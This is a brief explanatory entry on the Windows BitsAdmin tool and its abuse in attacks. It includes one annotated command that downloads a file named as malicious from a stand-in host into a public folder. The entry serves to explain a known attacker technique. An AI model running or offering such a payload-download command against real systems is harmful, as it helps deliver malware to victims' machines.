BitsAdmin

BitsAdmin is a command-line tool used to manage Background Intelligent Transfer Service (BITS) jobs on Windows operating systems. BITS is a service that facilitates asynchronous, prioritized, and throttled file transfers over HTTP or HTTPS, typically used for software updates and file downloads. BitsAdmin allows users to create, monitor, and control BITS jobs, such as downloading files from a remote server or uploading files to a server. It can be used for legitimate administrative purposes, like managing system updates, but is also commonly leveraged in cyber attacks for tasks such as downloading malicious payloads or exfiltrating data while evading detection.

bitsadmin /transfer myDownloadJob /download /priority high http://example.com/malicious_file.exe C:\Users\Public\malicious_file.exe

• bitsadmin: The command to run the BitsAdmin tool.

• /transfer myDownloadJob: Creates a BITS job named myDownloadJob.

• /download: Specifies that this is a download job.

• /priority high: Sets the priority of the job to high.

• http://example.com/malicious_file.exe: The URL of the file to be downloaded.

• C:\Users\Public\malicious_file.exe: The local path where the file will be saved.